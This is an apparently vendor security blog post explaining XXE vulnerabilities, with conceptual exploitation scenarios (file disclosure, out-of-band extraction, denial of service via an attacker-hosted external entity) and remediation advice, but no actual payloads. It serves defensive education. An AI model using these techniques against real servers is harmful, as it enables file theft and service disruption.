Security is hard to get right, and even in today’s security conscious world, there are a few serious vulnerabilities such as XML External Entity (XXE) that are being overlooked and end up becoming the cause for a breach. An XML External Entity (XXE) attack is a type of computer security vulnerability that is typically found in Web applications, allowing attackers to disclose files that are normally protected from a connected network or server. XXE vulnerability has now been known for more than a decade, however automated tools started detecting rudimentary cases of this issue only in the recent past. Therefore, if this vulnerability is exploited, the damage could be very severe ranging from information disclosure to denial of service or even remote code execution if everything falls into place.
In this blog, I will explain what an XXE vulnerability is, it’s exploits and discuss some remediation guidelines.
What is XML Entity?
XML allows the use of entities. Entities acts as “value” placeholder for data that will be used within the xml document. They help to shrink the entry of recurring information and allow for easier editing. XML has several pre-defined entities which are used to reference special characters like ‘’ and ‘&’. XML also allows user to define custom entities.
XXE can be exploited in various ways depending on how the application’s XML parser is set up.
How does XXE get exploited?
XXE can be exploited in various ways depending on how the application’s XML parser is set up and how the response is rendered on the client side. Some of the vectors of this exploit include applications’ output, backend evaluation and external interaction.
Local File Disclosure – Scenario 1
When an application evaluates the vulnerable request, and prints data on the client side, local file disclosure is possible. With a properly configured attack vector, an improperly configured parser would now look at the server’s system file and respond with the contents that was requested by the attacker.
Local File Disclosure – Scenario 2
If the requested file does not contain text data or if it is a broken xml file, then we need to take a different approach. We will need to use sub DTDs to extract these file types. Parameter entities are used here instead of general entities.
Local File Disclosure – Scenario 3
When an application evaluates the user input and is capable to lookup for an external file but will not print any output data on the screen, we will need to extract data by a method known as out of band XXE.
Denial of Service
One of the methods to create a Denial of Service is by using “External Entity Expansion” where you can reference an external xml file. If the XML parser is configured incorrectly, this will make a HTTP request to attackerIP.
The target file on the attacker’s IP could be written in a way that has recursive reference to other external entities. Before the XML parser processes this file, it must retrieve all the defined entities. This could lead to exhaustion of all available resources and effectively create denial of service.
Based on the application and how its XML parser has been configured, XXE can be leveraged to pull off advanced exploits such as:
Internal Port Scanning
Server Side Request Forgery
Remote Code Execution
Where is XXE found commonly?
Upload file functionality
XML based HTTP requests
How to remediate XXE
Be aware of your application’s XML library and how it works and disable anything that is not needed
Do not allow user-defined DTD, attributes and (external) entities
Perform input validation on user data before it is parsed by the XML parser
OWASP has detailed description on how to fix XXE for each platform
XXE has been observed more frequently in the recent past compared to SQL related issues and will continue to be an increasing security risk. Enterprises need to take proactive steps by conducting penetration testing to identify potential points of exploit on your organizations’ web applications.
Learn more about XXE attacks and vulnerabilities
Gain realistic insight into potential XXE attacks and vulnerability within your organizations’ networks, IoT devices, web and mobile applications. Download our white paper:today.